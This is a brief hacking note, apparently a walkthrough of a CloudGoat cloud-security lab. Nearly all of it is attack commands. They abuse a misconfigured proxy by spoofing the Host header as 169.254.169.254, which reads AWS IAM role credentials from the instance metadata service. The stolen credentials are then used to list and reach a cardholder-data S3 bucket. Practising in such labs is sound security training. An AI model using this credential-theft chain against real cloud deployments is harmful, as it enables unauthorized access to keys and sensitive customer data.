Hack. Eat. Sleep. Repeat!!!
#Finding username
curl x.x.x.x/latest/meta-data/iam/security-credentials/ -H "Host: 169.254.169.254"
#grabbing key
curl x.x.x.x/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-*/ -H "Host: 169.254.169.254"
enumerate-iam shows that we can list bucketsaws s3 ls --profile cloud_breach
aws s3 ls s3://cg-cardholder-data-bucket-cgid* --profile cloud_breach